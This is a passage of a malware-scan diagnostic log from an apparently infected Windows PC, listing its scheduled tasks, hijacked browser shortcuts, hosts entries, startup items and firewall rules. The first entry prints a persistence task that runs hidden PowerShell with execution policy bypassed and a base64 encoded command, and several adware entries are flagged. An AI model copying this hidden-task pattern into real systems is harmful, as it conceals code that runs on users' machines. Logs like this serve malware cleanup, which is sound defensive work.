Task: {FAC6784A-CB17-4B4D-BDC7-4A4F34BACBE2} - System32\Tasks\{08080F47-0D0F-0F09-7D11-7A79790B110F} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAA (the data entry has 9540 more characters).
Task: {FB119739-D5B0-4725-B8A1-6684820F96FB} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\Windows\ehome\ehrec.exe
Task: {FC48FBF3-30B8-44A9-9A0B-C568A2FC47CD} - \LuckyTab -> No File <==== ATTENTION
Task: {FC5FE3D1-68A5-4CAD-84FC-0A61139E9C31} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\Windows\ehome\ehPrivJob.exe
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\BJZJKCUBLH1.job => C:\ProgramData\FlashBeat\FlashBeat.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001Core.job => C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001UA.job => C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\WMMAWVKOLXONAOYC.job => C:\ProgramData\Service1291\Service1291.exe <==== ATTENTION
 
==================== Shortcuts =============================
 
(The entries could be listed to be restored or removed.)
 
ShortcutWithArgument: C:\Users\RoNiN\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=G3Bzftpbl2,e1b01de2-6ffd-4997-b986-c41b3ac4ed72,
ShortcutWithArgument: C:\Users\RoNiN\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Microsoft Edge (2).lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> "microsoft-edge:hxxp://www%2dsearching.com/?prd=set_epc&s=G3Bzftpbl2,e1b01de2-6ffd-4997-b986-c41b3ac4ed72,"
ShortcutWithArgument: C:\Users\RoNiN\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\a41ce5b91aa3166e\MightyText - SMS from PC & Text from Computer.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www%2dsearching.com/?prd=set_epc&s=G3Bzftpbl2,e1b01de2-6ffd-4997-b986-c41b3ac4ed72,
 
==================== Loaded Modules (Whitelisted) ==============
 
2015-07-09 23:33 - 2015-07-09 23:33 - 00028160 _____ () C:\WINDOWS\SYSTEM32\efsext.dll
2015-09-10 01:08 - 2015-09-10 01:08 - 00032768 _____ () C:\WINDOWS\SYSTEM32\licensemanagerapi.dll
2015-09-23 20:35 - 2015-12-29 12:12 - 00019640 _____ () C:\Program Files\NVIDIA Corporation\CoProcManager\detoured.dll
2015-09-10 01:08 - 2015-09-10 01:08 - 00404480 _____ () C:\WINDOWS\System32\diagtrack_wininternal.dll
2015-10-03 08:23 - 2015-10-03 08:23 - 02494712 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2015-10-03 08:23 - 2015-10-03 08:23 - 02494712 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2015-10-03 08:23 - 2015-10-03 08:23 - 00429056 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2015-12-09 04:52 - 2015-11-25 00:20 - 06569472 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2015-12-09 04:51 - 2015-11-25 00:17 - 00471040 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2015-12-09 04:52 - 2015-11-25 00:17 - 01808384 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2015-10-03 08:23 - 2015-10-03 08:23 - 02274816 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2015-07-09 23:13 - 2015-09-10 01:08 - 00210432 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.ProxyStub.dll
2009-12-10 04:39 - 2008-09-19 04:03 - 00167936 _____ () C:\Program Files (x86)\PostgreSQL\8.3\bin\LIBPQ.dll
2009-02-12 20:01 - 2006-11-06 19:18 - 00963584 _____ () C:\Program Files (x86)\PostgreSQL\8.3\bin\libxml2.dll
2005-07-20 06:48 - 2005-07-20 07:48 - 00059904 _____ () C:\Program Files (x86)\PostgreSQL\8.3\bin\zlib1.dll
2008-02-04 22:43 - 2008-02-04 23:43 - 00027136 _____ () C:\Program Files (x86)\PostgreSQL\8.3\lib\plugins\plugin_debugger.dll
2016-02-10 21:59 - 2016-02-10 21:59 - 00170496 _____ () C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\IsdiInterop\c77312f309b32c7ba095241bb8fa6749\IsdiInterop.ni.dll
2010-06-18 01:06 - 2010-04-13 12:52 - 00058880 _____ () C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IsdiInterop.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\Users\RoNiN\Desktop\Natephotobomb.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\RoNiN\Desktop\Natephotobomb.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\RoNiN\Desktop\Natephotobomb.jpg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\RoNiN\Downloads\BBKings Everclear.png:SummaryInformation [0]
AlternateDataStreams: C:\Users\RoNiN\Downloads\BBKings Everclear.png:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\RoNiN\Downloads\BBKings Everclear.png:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\RoNiN\Downloads\wddrnote.gif:SummaryInformation [151]
AlternateDataStreams: C:\Users\RoNiN\Downloads\wddrnote.gif:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\RoNiN\Downloads\wdid.gif:SummaryInformation [151]
AlternateDataStreams: C:\Users\RoNiN\Downloads\wdid.gif:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mbamchameleon => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mbamchameleon => ""="Driver"
 
==================== EXE Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2015-07-19 13:15 - 2016-03-11 19:16 - 00000967 ____A C:\WINDOWS\system32\Drivers\etc\hosts
 
127.0.0.1       down.baidu2016.com
127.0.0.1       123.sogou.com
127.0.0.1       www.czzsyzgm.com
127.0.0.1       www.czzsyzxl.com
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-470165136-1162808608-978993673-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\RoNiN\Desktop\Pics\Taxi Driver Cinespia.jpg
DNS Servers: Media is not connected to internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: ) (ConsentPromptBehaviorUser: ) (EnableLUA: )
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(Currently there is no automatic fix for this section.)
 
MSCONFIG\Services: 1198E835-A0AB-4C55-9629-D16AFAD406CB => 3
MSCONFIG\Services: 93530252-4B7E-48FF-9DAA-4D90DB571BBB => 3
MSCONFIG\Services: ACDaemon => 2
MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3
MSCONFIG\Services: APNMCP => 2
MSCONFIG\Services: Apple Mobile Device => 2
MSCONFIG\Services: AppxikenoZ => 2
MSCONFIG\Services: Bonjour Service => 2
MSCONFIG\Services: BrsHelper => 2
MSCONFIG\Services: btwdins => 2
MSCONFIG\Services: CLDTVHNService => 2
MSCONFIG\Services: CloudPrinter => 2
MSCONFIG\Services: CltMngSvc => 2
MSCONFIG\Services: Dataup => 2
MSCONFIG\Services: dojygici => 2
MSCONFIG\Services: Ejuvde => 2
MSCONFIG\Services: ETDService => 2
MSCONFIG\Services: FirebirdServerMAGIXInstance => 3
MSCONFIG\Services: Gambali => 2
MSCONFIG\Services: groover110320162257 Updater => 2
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: IntuitUpdateServiceV4 => 2
MSCONFIG\Services: iPod Service => 3
MSCONFIG\Services: Jhfuy => 2
MSCONFIG\Services: kBTNrls => 2
MSCONFIG\Services: McciCMService => 2
MSCONFIG\Services: McciCMService64 => 2
MSCONFIG\Services: MPCProtectService => 
MSCONFIG\Services: mwrc => 2
MSCONFIG\Services: Nijgatfy => 2
MSCONFIG\Services: NvNetworkService => 2
MSCONFIG\Services: NvStreamSvc => 2
MSCONFIG\Services: nvsvc => 2
MSCONFIG\Services: RealNetworks Downloader Resolver Service => 2
MSCONFIG\Services: Service Mgr FindSearchWindow => 2
MSCONFIG\Services: shopperz130320161459 Updater => 2
MSCONFIG\Services: SkypeUpdate => 2
MSCONFIG\Services: SMUpd => 2
MSCONFIG\Services: SPBIUpd => 2
MSCONFIG\Services: ss_conn_service => 2
MSCONFIG\Services: TeamViewer => 2
MSCONFIG\Services: Update Mgr FindSearchWindow => 2
MSCONFIG\Services: wdsvc => 2
MSCONFIG\Services: wrc => 2
MSCONFIG\Services: wucotusy => 2
MSCONFIG\Services: wugixojyzbt => 2
MSCONFIG\Services: YahooAUService => 2
MSCONFIG\Services: zigipyro => 2
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Bluetooth.lnk => C:\windows\pss\Bluetooth.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Microsoft Office.lnk => C:\windows\pss\Microsoft Office.lnk.CommonStartup
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: Amazon Music => "C:\Users\RoNiN\AppData\Local\Amazon Music\Amazon Music Helper.exe"
MSCONFIG\startupreg: ApplePhotoStreams => C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
MSCONFIG\startupreg: AppleSyncNotifier => C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleSyncNotifier.exe
MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: ArcSoft Connection Service => C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACDaemon.exe
MSCONFIG\startupreg: Bing Bar => "C:\Program Files (x86)\MSN Toolbar\Platform\5.0.1423.0\mswinext.exe"
MSCONFIG\startupreg: BitTorrent => "C:\Users\RoNiN\AppData\Roaming\BitTorrent\BitTorrent.exe"  /MINIMIZED
MSCONFIG\startupreg: com.apple.dav.bookmarks.daemon => C:\Program Files (x86)\Common Files\Apple\Internet Services\BookmarkDAV_client.exe
MSCONFIG\startupreg: DAEMON Tools Lite => "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
MSCONFIG\startupreg: HP Photosmart 6510 series (NET) => "C:\Program Files\HP\HP Photosmart 6510 series\Bin\ScanToPCActivationApp.exe" -deviceID "CN1852217505QB:NW" -scfn "HP Photosmart 6510 series (NET)" -AutoStart 1
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: Live Update 5 => C:\Program Files (x86)\MSI\Live Update 5\BootStartLiveupdate.exe /reminder
MSCONFIG\startupreg: Microsoft Default Manager => "C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Default Manager\DefMgr.exe" -resume
MSCONFIG\startupreg: Nikon Message Center 2 => C:\Program Files (x86)\Nikon\Nikon Message Center 2\NkMC2.exe -s
MSCONFIG\startupreg: NvBackend => "C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe"
MSCONFIG\startupreg: PCShowServer => "C:\Users\RoNiN\AppData\Local\DIRECTV Player\PCShowServerPMWrapper.exe"
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
MSCONFIG\startupreg: ShadowPlay => C:\windows\system32\rundll32.exe C:\windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
MSCONFIG\startupreg: SkyDrive => "C:\Users\RoNiN\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe" /background
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: TkBellExe => "C:\Users\RoNiN\update\realsched.exe"  -osboot
MSCONFIG\startupreg: TomTomHOME.exe => "C:\Program Files (x86)\TomTom HOME 2\TomTomHOMERunner.exe"
MSCONFIG\startupreg: UpdReg => C:\windows\UpdReg.EXE
HKLM\...\StartupApproved\StartupFolder: => "bsod.hta"
HKLM\...\StartupApproved\StartupFolder: => "AllPCoptimizer.exe.lnk"
HKLM\...\StartupApproved\StartupFolder: => "WebBrowserMixVideoPlayer.lnk"
HKLM\...\StartupApproved\Run: => "THXCfg64"
HKLM\...\StartupApproved\Run: => "IDSCPRODUCT"
HKLM\...\StartupApproved\Run: => "SpaceSoundPro"
HKLM\...\StartupApproved\Run32: => "IAStorIcon"
HKLM\...\StartupApproved\Run32: => "TkBellExe"
HKLM\...\StartupApproved\Run32: => "CitrixReceiver"
HKLM\...\StartupApproved\Run32: => "Rt45"
HKLM\...\StartupApproved\Run32: => "BSOD"
HKLM\...\StartupApproved\Run32: => "QwaT1"
HKLM\...\StartupApproved\Run32: => "QwaT4"
HKLM\...\StartupApproved\Run32: => "QwaT5"
HKLM\...\StartupApproved\Run32: => "QwaTgg"
HKLM\...\StartupApproved\Run32: => "QwaT22"
HKLM\...\StartupApproved\Run32: => "QwaT55"
HKLM\...\StartupApproved\Run32: => "QwaT21"
HKLM\...\StartupApproved\Run32: => "QwaT78"
HKLM\...\StartupApproved\Run32: => "QwaT"
HKLM\...\StartupApproved\Run32: => "Rty01"
HKLM\...\StartupApproved\Run32: => "cpx"
HKLM\...\StartupApproved\Run32: => "Rt562@"
HKLM\...\StartupApproved\Run32: => "mpck_en_005030264"
HKLM\...\StartupApproved\Run32: => "msrtn32"
HKLM\...\StartupApproved\Run32: => "ospd_us_037010264"
HKLM\...\StartupApproved\Run32: => "SPDriver"
HKLM\...\StartupApproved\Run32: => "rec_en_222"
HKLM\...\StartupApproved\Run32: => "rec_en_224"
HKLM\...\StartupApproved\Run32: => "rst"
HKLM\...\StartupApproved\Run32: => "sun13"
HKLM\...\StartupApproved\Run32: => "TV"
HKLM\...\StartupApproved\Run32: => "win_en_77"
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\StartupApproved\StartupFolder: => "Storm Alerts.lnk"
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\StartupApproved\StartupFolder: => "StormAlertsApp.lnk"
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\StartupApproved\Run: => "SideSync"
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\StartupApproved\Run: => "wdbext"
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\StartupApproved\Run: => "Windi"
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [MSMQ-In-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => (Allow) LPort=808
FirewallRules: [{DCB933B0-7F4D-454F-AC6A-1E854FAE7247}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{9A607EBD-98B0-4DF0-8832-162C6520DD96}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{C2050471-EF7B-454E-BAD7-031B8C799034}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{26946E3E-72F1-4A5C-928D-74383A9063F6}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{BB357A36-3CB3-42AA-9482-3F82B3FBF5B6}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{F5A9A71E-E542-4B60-AC88-407CF349333D}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdater.exe
FirewallRules: [{6DFDF484-35F7-4560-806F-3D534DDC2B99}] => (Allow) C:\Program Files (x86)\SmileFiles\downloader.exe
FirewallRules: [{89BB93BD-D481-4B92-B90D-3BE936589FAE}] => (Allow) C:\Program Files (x86)\SmileFiles\downloader.exe
FirewallRules: [{5A121057-400D-4F36-8298-4F9AF137952B}] => (Allow) C:\Program Files (x86)\SmileFiles\SmileFiles.exe
FirewallRules: [{3E527C67-8AFB-4CE0-8CE4-B6A32ABC7746}] => (Allow) C:\Program Files (x86)\SmileFiles\SmileFiles.exe
FirewallRules: [{81FF04D0-1773-4D9A-B5C8-968B7598EB18}] => (Allow) C:\Users\RoNiN\AppData\Local\Temp\Temp2_Adobe_Captivate_-_8_keymaker.zip\Adobe_Captivate_-_8_keymaker.exe
FirewallRules: [{9F08737F-5B12-4519-92BF-D00087D34BB5}] => (Allow) C:\Users\RoNiN\AppData\Local\Temp\Temp2_Adobe_Captivate_-_8_keymaker.zip\Adobe_Captivate_-_8_keymaker.exe
FirewallRules: [{BB182CB8-8875-4B4D-9B6D-F473006EE41C}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{5FDCDFBB-4E64-4094-9759-EE002B6FFE85}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{84B7E979-84E3-4C39-A80B-BD495552BF32}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{1DDD067C-DEBB-4C88-B5D4-D745459DD54D}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{7B1D4FC6-DA08-4C98-8AFA-1334AD39B3D2}] => (Allow) C:\Users\RoNiN\AppData\Local\Temp\nsv3E49.tmp\CnetInstaller-10858997.exe
FirewallRules: [{C717ECD5-2072-4B28-AB16-A10FE79A6747}] => (Allow) C:\Users\RoNiN\AppData\Local\Temp\nsv3E49.tmp\CnetInstaller-10858997.exe
FirewallRules: [{A63643D2-7DB5-45C0-815B-0BC12A98D7DB}] => (Allow) C:\Users\RoNiN\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{FAF34DC7-FE08-41E6-B320-A00C22ADF40A}] => (Allow) C:\Users\RoNiN\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{BA9DADD6-12A8-4990-84DA-ECA69E4AA620}] => (Allow) C:\Program Files (x86)\iTunes\iTunes.exe
FirewallRules: [{CA37E765-C7C0-4281-A08F-8FBDCDE18C87}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{89BF33C2-1135-4A44-9001-EAEE8DB8C080}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{61DF9056-88E2-4465-8B1E-17205E0B3AD9}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
FirewallRules: [{9274EE06-3B2C-469C-AC6B-8B3E4A10C4F3}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
FirewallRules: [{35EF7245-A384-4B7E-9B89-637569982991}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{B977E4D9-F7AC-45A2-B90D-5DDF575DB3BA}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [UDP Query User{7C597374-95E2-4417-A87A-71B539C01019}C:\program files (x86)\skifta\jre\bin\javaw.exe] => (Allow) C:\program files (x86)\skifta\jre\bin\javaw.exe
FirewallRules: [TCP Query User{9788F4B3-41F7-4EA5-B1E2-D19F666BA212}C:\program files (x86)\skifta\jre\bin\javaw.exe] => (Allow) C:\program files (x86)\skifta\jre\bin\javaw.exe
FirewallRules: [{E248708E-EA33-4BF1-A171-A713ADDD2941}] => (Allow) C:\Program Files (x86)\DirecTV\DirecTV\Kernel\CLML\VDTVRec.exe
FirewallRules: [{65210182-2E03-4646-BBD6-9F96C2918788}] => (Allow) C:\Program Files (x86)\DirecTV\DirecTV\VDTV.exe
FirewallRules: [{F1CC8CBC-6754-4E6A-99A0-F76940155FCA}] => (Allow) C:\Program Files (x86)\DirecTV\DirecTV\DIRECTV2PC™.exe
FirewallRules: [UDP Query User{2DE0EB4D-0CA1-455B-A108-E0E24BFD44D3}C:\users\ronin\appdata\local\directv player\ndspcshowserver.exe] => (Allow) C:\users\ronin\appdata\local\directv player\ndspcshowserver.exe
FirewallRules: [TCP Query User{B68FF020-2C6B-4B79-8D45-0DC50FC42D25}C:\users\ronin\appdata\local\directv player\ndspcshowserver.exe] => (Allow) C:\users\ronin\appdata\local\directv player\ndspcshowserver.exe
FirewallRules: [UDP Query User{AFD0A82C-C4E1-4E73-90C0-07802FC353B5}C:\program files (x86)\videolan\vlc\vlc.exe] => (Allow) C:\program files (x86)\videolan\vlc\vlc.exe
FirewallRules: [TCP Query User{598AD19C-0B0E-445B-BB74-0880AFE78AED}C:\program files (x86)\videolan\vlc\vlc.exe] => (Allow) C:\program files (x86)\videolan\vlc\vlc.exe
FirewallRules: [UDP Query User{D3F472F7-4BC3-4FE8-9A87-D9BA9CB10426}C:\program files (x86)\java\jre7\bin\java.exe] => (Allow) C:\program files (x86)\java\jre7\bin\java.exe
FirewallRules: [TCP Query User{69B5A1AB-8D48-493A-9CE5-921246FF99B5}C:\program files (x86)\java\jre7\bin\java.exe] => (Allow) C:\program files (x86)\java\jre7\bin\java.exe
FirewallRules: [{C14CC1E9-D19E-445F-B5A4-CF287A85B2CD}] => (Allow) C:\Program Files (x86)\Battlelog Web Plugins\Sonar\0.70.4\SonarHost.exe
FirewallRules: [{40387BB8-F0FE-42C1-A9BF-5055B9101901}] => (Allow) C:\Program Files (x86)\Battlelog Web Plugins\Sonar\0.70.4\SonarHost.exe
FirewallRules: [{E8C806F4-FCF2-4D38-96BB-E79901D6BF50}] => (Allow) C:\Users\RoNiN\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe
FirewallRules: [UDP Query User{E5F5F020-2D99-4CCC-B65D-967BE23F08C9}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe
FirewallRules: [TCP Query User{B460AF68-0916-4A9D-845A-A4B0616D9390}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe
FirewallRules: [UDP Query User{37444A00-F2A0-41C0-9FA9-826095DE3B32}C:\program files (x86)\soundspectrum\g-force\g-force standalone.exe] => (Allow) C:\program files (x86)\soundspectrum\g-force\g-force standalone.exe
FirewallRules: [TCP Query User{DE6ED13C-B642-4492-BDC8-0E5DB99C1E00}C:\program files (x86)\soundspectrum\g-force\g-force standalone.exe] => (Allow) C:\program files (x86)\soundspectrum\g-force\g-force standalone.exe
FirewallRules: [UDP Query User{4C7104F5-63FB-438C-823D-A35A400624B0}C:\ubisoft\ghost recon online\ncsa-live\ghostrecononline.exe] => (Allow) C:\ubisoft\ghost recon online\ncsa-live\ghostrecononline.exe
FirewallRules: [TCP Query User{E114CBFB-489F-4CF7-A7FE-D25369C364E9}C:\ubisoft\ghost recon online\ncsa-live\ghostrecononline.exe] => (Allow) C:\ubisoft\ghost recon online\ncsa-live\ghostrecononline.exe
FirewallRules: [UDP Query User{E71F51CE-C614-4210-8EAB-E66DA6406E71}C:\users\ronin\appdata\local\apps\2.0\w8a6hk1p.jzq\cbm5w0jt.va0\laun...app_59711684aa47878d_0001.001b_6f29478cafd19413\launcher.exe] => (Allow) C:\users\ronin\appdata\local\apps\2.0\w8a6hk1p.jzq\cbm5w0jt.va0\laun...app_59711684aa47878d_0001.001b_6f29478cafd19413\launcher.exe
FirewallRules: [TCP Query User{8AA57984-68B3-45DC-8119-097D6F88D2B9}C:\users\ronin\appdata\local\apps\2.0\w8a6hk1p.jzq\cbm5w0jt.va0\laun...app_59711684aa47878d_0001.001b_6f29478cafd19413\launcher.exe] => (Allow) C:\users\ronin\appdata\local\apps\2.0\w8a6hk1p.jzq\cbm5w0jt.va0\laun...app_59711684aa47878d_0001.001b_6f29478cafd19413\launcher.exe
FirewallRules: [{5E956ABE-03F0-40F0-B5FD-A72327901ECB}] => (Allow) C:\Program Files\HP\HP Photosmart 6510 series\Bin\HPNetworkCommunicator.exe
FirewallRules: [{DBE93BD7-16AE-4F98-8258-2527D6470650}] => (Allow) C:\Program Files\HP\HP Photosmart 6510 series\Bin\DeviceSetup.exe
FirewallRules: [{089AD9AE-AC83-406D-9990-40CFFB6A2530}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{C5B9CBB7-FE93-4953-9BDA-18EB5FB1CEC3}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{28027EB1-3CD1-4AB9-9181-D5BE253524A3}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{60462D02-9714-4CAC-B848-189CF26E9EE6}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{48094F2A-771F-461B-9BD5-8B359CAFA391}] => (Allow) C:\Program Files (x86)\Yahoo!\Messenger\YahooMessenger.exe
FirewallRules: [{3F8CF68A-FABB-42CD-81A0-BB6DECC7CB42}] => (Allow) C:\Program Files (x86)\Yahoo!\Messenger\YahooMessenger.exe
FirewallRules: [UDP Query User{C7C2327C-D3C1-41C5-AB41-DEE0EEC21AAA}C:\users\ronin\desktop\xbins.exe] => (Allow) C:\users\ronin\desktop\xbins.exe
FirewallRules: [TCP Query User{E438E8F6-1BE1-467A-A785-C0CB554B86A5}C:\users\ronin\desktop\xbins.exe] => (Allow) C:\users\ronin\desktop\xbins.exe
FirewallRules: [UDP Query User{E596C476-1196-40F8-BFE6-B824FE54A20B}C:\program files (x86)\soundspectrum\g-force\g-force standalone.exe] => (Allow) C:\program files (x86)\soundspectrum\g-force\g-force standalone.exe
FirewallRules: [TCP Query User{C7758164-0B81-4791-889E-300E02DDD3A1}C:\program files (x86)\soundspectrum\g-force\g-force standalone.exe] => (Allow) C:\program files (x86)\soundspectrum\g-force\g-force standalone.exe
FirewallRules: [{2D65E536-5186-4C6E-9096-F61DA03C28C7}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
FirewallRules: [{B0809214-275E-4E04-90A3-D518576DC9B1}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
FirewallRules: [{561A074B-345A-4717-95D2-2E76E4E1F07E}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
FirewallRules: [{56D831B4-E1DA-46C5-AEBA-E99CF56D64C5}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
FirewallRules: [{24AEF387-0CDA-424A-8BF0-C2BA9883AB8E}] => (Allow) C:\Program Files (x86)\Vuze\Azureus.exe
FirewallRules: [{EB7139D0-3153-4828-9815-172088552B9C}] => (Allow) C:\Program Files (x86)\Vuze\Azureus.exe
